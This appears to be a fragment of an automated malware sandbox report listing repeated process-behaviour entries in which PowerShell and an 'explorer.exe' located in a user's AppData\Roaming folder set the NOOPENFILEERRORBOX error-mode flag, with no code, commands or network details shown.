            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
